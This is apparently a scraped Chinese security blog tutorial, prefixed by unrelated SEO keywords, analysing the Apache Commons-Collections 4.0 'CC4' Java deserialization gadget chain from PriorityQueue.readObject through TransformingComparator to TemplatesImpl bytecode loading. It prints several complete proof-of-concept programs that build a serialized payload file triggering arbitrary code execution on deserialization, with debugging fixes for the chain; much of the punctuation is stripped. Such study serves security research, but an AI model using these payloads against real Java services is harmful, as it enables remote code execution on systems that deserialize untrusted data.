如何把自己做的网站挂网上,郑州网站开发招聘,让wordpress主题适用插件,一个做网站的公司年收入#x1f338; CC4
CC4要求的commons-collections的版本是4.0的大版本。
其实后半条链是和cc3一样的#xff0c;但是前面由于commons-collections进行了大的升级#xff0c;所以出现了新的前半段链子。
配置文件#xff1a;
dependencygroupIdorg.apach… CC4
CC4要求的commons-collections的版本是4.0的大版本。
其实后半条链是和cc3一样的但是前面由于commons-collections进行了大的升级所以出现了新的前半段链子。
配置文件
dependencygroupIdorg.apache.commons/groupIdartifactIdcommons-collections4/artifactIdversion4.0/version
/dependency 链子分析
还是从transform开始分析查找调用transform方法的地方 发现在comparators对比器中TransformingComparator类中的compare方法中调用了transform方法这是一个经典的比较器。
public int compare(final I obj1, final I obj2) {final O value1 this.transformer.transform(obj1);final O value2 this.transformer.transform(obj2);return this.decorated.compare(value1, value2);
}
继续向前查找谁又调用了compare方法当然查找的方法还是一样的这里的搜索结果就比较多了 我们期望最好的结果就是某一个类中的readObject方法中调用了compare方法。这里就直接看结果在PriorityQueue类中的readObject方法中调用了compare方法 PriorityQueue类实现了Serializable接口可以进行序列化。 其代码如上可以看到在PriorityQueue类中的readObject方法的最后调用了heapify方法。继续跟进到heapify方法里面
private void heapify() {for (int i (size 1) - 1; i 0; i--)siftDown(i, (E) queue[i]);
}
该方法中通过for循环去调用了siftDown方法for循环中的i初始化为size右移3位。继续跟进到siftDown方法中
private void siftDown(int k, E x) {if (comparator ! null)siftDownUsingComparator(k, x);elsesiftDownComparable(k, x);
}
siftDown方法中通过if (comparator ! null)判断comparator是否为空如果不为空的话就调用siftDownUsingComparator方法继续跟进到这个方法中 最后在siftDownUsingComparator方法中通过comparator.compare()调用了compare方法。从而最终实现了代码执行后面的半条链子就接上了cc3的链子。
该类的构造器也是可以直接访问的传入的参数就是comparator。 到这里的话就是比较清晰了
PriorityQueue#readObject-PriorityQueue#heapify-PriorityQueue#siftDown-siftDownUsingComparator-TransformingComparator#compare
后续的话就是接上了cc3的链子 编写POC
那么就可以尝试写POC了
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;public class CC4 {public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {TemplatesImpl templates new TemplatesImpl();Class? extends TemplatesImpl templatesClass templates.getClass();Field nameFeild templatesClass.getDeclaredField(_name);nameFeild.setAccessible(true);nameFeild.set(templates,aaa);Field bytecodesField templatesClass.getDeclaredField(_bytecodes);bytecodesField.setAccessible(true);byte[] code Files.readAllBytes(Paths.get(C:\\tmp\\Test.class));byte[][] codes {code};bytecodesField.set(templates,codes);//修改_tfactory变量
// Field tfactoryField templatesClass.getDeclaredField(_tfactory);
// tfactoryField.setAccessible(true);
// tfactoryField.set(templates,new TransformerFactoryImpl());// templates.newTransformer();InstantiateTransformer instantiateTransformer new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});//下面回去调用transform方法这里需要传入参数的Object input这里的input就是TrAXFilter类的对象Transformer[] transformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),instantiateTransformer};ChainedTransformer chainedTransformer new ChainedTransformer(transformers);TransformingComparator comparator new TransformingComparator(chainedTransformer);PriorityQueueTransformer priorityQueue new PriorityQueue(comparator);serialization(priorityQueue);deserialization();}public static void serialization(Object o) throws IOException {ObjectOutputStream objectOutputStream new ObjectOutputStream(new FileOutputStream(cc4.ser));objectOutputStream.writeObject(o);objectOutputStream.close();}public static void deserialization() throws IOException, ClassNotFoundException {ObjectInputStream objectInputStream new ObjectInputStream(new FileInputStream(cc4.ser));objectInputStream.readObject();objectInputStream.close();}
}但是当我们运行结束的时候发现并没有执行任何代码。直接就结束了也没有报错信息 解决问题
因为我们想要尝试去执行PriorityQueue的readObject方法所以我们直接尝试下断点到heapify 然后我们尝试进行调试 跟进到这里我们可以发现size的结果是0接下来执行的是for循环的第一次i的结果就是size1在java中的含义是将一个数的二进制数右移几位并在左侧空出来的位置使用0进行填充。因此由于这里的size就是0所以往右移动1位还是0然后i0-1得到了i-1由于i0这个条件并没有满足所以整个for循环就没有进去
2的二进制为00000010 ------- 00000001(右移一位的结果就是1)所以我们可以让size的结果是大于等于2的结果此时就会进入for循环啦这里有两个方法 首先这里我们看到size是private修饰的所以我们可以尝试直接通过反射来修改size的参数值。第二种方式就是可以通过往队列里面放入两个值也是可以的 往队列里面存放值解决
首先我们可以直接往priorityQueue里面存放队列add方法用来增加队列传递Transformer就可以了所以我们尝试传递两个ConstantTransformer import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;public class CC4 {public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {TemplatesImpl templates new TemplatesImpl();Class? extends TemplatesImpl templatesClass templates.getClass();Field nameFeild templatesClass.getDeclaredField(_name);nameFeild.setAccessible(true);nameFeild.set(templates,aaa);Field bytecodesField templatesClass.getDeclaredField(_bytecodes);bytecodesField.setAccessible(true);byte[] code Files.readAllBytes(Paths.get(C:\\tmp\\Test.class));byte[][] codes {code};bytecodesField.set(templates,codes);//修改_tfactory变量Field tfactoryField templatesClass.getDeclaredField(_tfactory);tfactoryField.setAccessible(true);tfactoryField.set(templates,new TransformerFactoryImpl());InstantiateTransformer instantiateTransformer new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});//下面回去调用transform方法这里需要传入参数的Object input这里的input就是TrAXFilter类的对象Transformer[] transformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),instantiateTransformer};ChainedTransformer chainedTransformer new ChainedTransformer(transformers);TransformingComparator comparator new TransformingComparator(chainedTransformer);PriorityQueueTransformer priorityQueue new PriorityQueue(comparator);priorityQueue.add(new ConstantTransformer(1));priorityQueue.add(new ConstantTransformer(2));serialization(priorityQueue);
// deserialization();}public static void serialization(Object o) throws IOException {ObjectOutputStream objectOutputStream new ObjectOutputStream(new FileOutputStream(cc4.ser));objectOutputStream.writeObject(o);objectOutputStream.close();}public static void deserialization() throws IOException, ClassNotFoundException {ObjectInputStream objectInputStream new ObjectInputStream(new FileInputStream(cc4.ser));objectInputStream.readObject();objectInputStream.close();}
} 但是发现代码在序列化的时候就执行了弹计算器的操作继续调试我们发现在我们add的时候断点直接下载add方法中发现调用了offer方法 第二次add的时候由于前面已经是add了一个值所以size变成了1然而初始化int i size的时候i的值就变成了 1 继续跟进到offer方法中然而在offer方法中其完整的代码如下
public boolean offer(E e) {if (e null)throw new NullPointerException();modCount;int i size;if (i queue.length)grow(i 1);size i 1;if (i 0)queue[0] e;elsesiftUp(i, e);return true;
}
这里就又调用了siftUp方法继续跟进 跟进到siftUp方法中发现 调用了siftUpUsingComparator再次跟进 然而在siftUpUsingComparator方法中居然就调用了compare方法导致了我们的代码执行所以这里需要通过反射改掉前面的某一个值这个类似于前面的cc比如改掉chainedTransformer或者comparator里面的值就好了 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;public class CC4 {public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {TemplatesImpl templates new TemplatesImpl();Class? extends TemplatesImpl templatesClass templates.getClass();Field nameFeild templatesClass.getDeclaredField(_name);nameFeild.setAccessible(true);nameFeild.set(templates,aaa);Field bytecodesField templatesClass.getDeclaredField(_bytecodes);bytecodesField.setAccessible(true);byte[] code Files.readAllBytes(Paths.get(C:\\tmp\\Test.class));byte[][] codes {code};bytecodesField.set(templates,codes);//修改_tfactory变量Field tfactoryField templatesClass.getDeclaredField(_tfactory);tfactoryField.setAccessible(true);tfactoryField.set(templates,new TransformerFactoryImpl());InstantiateTransformer instantiateTransformer new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});//下面回去调用transform方法这里需要传入参数的Object input这里的input就是TrAXFilter类的对象Transformer[] transformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),instantiateTransformer};ChainedTransformer chainedTransformer new ChainedTransformer(transformers);TransformingComparator comparator new TransformingComparator(new ConstantTransformer(1));PriorityQueueTransformer priorityQueue new PriorityQueue(comparator);//解决for循环不进入的问题priorityQueue.add(new ConstantTransformer(1));priorityQueue.add(new ConstantTransformer(2));Class? extends TransformingComparator aClass comparator.getClass();Field transformerField aClass.getDeclaredField(transformer);transformerField.setAccessible(true);transformerField.set(comparator,chainedTransformer);
// serialization(priorityQueue);deserialization();}public static void serialization(Object o) throws IOException {ObjectOutputStream objectOutputStream new ObjectOutputStream(new FileOutputStream(cc4.ser));objectOutputStream.writeObject(o);objectOutputStream.close();}public static void deserialization() throws IOException, ClassNotFoundException {ObjectInputStream objectInputStream new ObjectInputStream(new FileInputStream(cc4.ser));objectInputStream.readObject();objectInputStream.close();}
}反射解决
直接通过反射获取PriorityQueue这个类的原型类然后进行获取私有的属性最后在修改这个属性的参数。 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;public class CC4 {public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {TemplatesImpl templates new TemplatesImpl();Class? extends TemplatesImpl templatesClass templates.getClass();Field nameFeild templatesClass.getDeclaredField(_name);nameFeild.setAccessible(true);nameFeild.set(templates,aaa);Field bytecodesField templatesClass.getDeclaredField(_bytecodes);bytecodesField.setAccessible(true);byte[] code Files.readAllBytes(Paths.get(C:\\tmp\\Test.class));byte[][] codes {code};bytecodesField.set(templates,codes);//修改_tfactory变量Field tfactoryField templatesClass.getDeclaredField(_tfactory);tfactoryField.setAccessible(true);tfactoryField.set(templates,new TransformerFactoryImpl());InstantiateTransformer instantiateTransformer new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});//下面回去调用transform方法这里需要传入参数的Object input这里的input就是TrAXFilter类的对象Transformer[] transformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),instantiateTransformer};ChainedTransformer chainedTransformer new ChainedTransformer(transformers);TransformingComparator comparator new TransformingComparator(chainedTransformer);PriorityQueueTransformer priorityQueue new PriorityQueue(comparator);Class? extends PriorityQueue aClass priorityQueue.getClass();Field sizeField aClass.getDeclaredField(size);sizeField.setAccessible(true);sizeField.set(priorityQueue,2);serialization(priorityQueue);deserialization();}public static void serialization(Object o) throws IOException {ObjectOutputStream objectOutputStream new ObjectOutputStream(new FileOutputStream(cc4.ser));objectOutputStream.writeObject(o);objectOutputStream.close();}public static void deserialization() throws IOException, ClassNotFoundException {ObjectInputStream objectInputStream new ObjectInputStream(new FileInputStream(cc4.ser));objectInputStream.readObject();objectInputStream.close();}
}以上代码便可以成功的执行代码弹出计算器这里不需要反射修改chainedTransformer或者comparator的原因是我们通过反射的方法修改了size的参数值并没有利用add方法也就不会在序列化的时候就调用compare方法也就不会在序列化的过程中就弹出计算器了
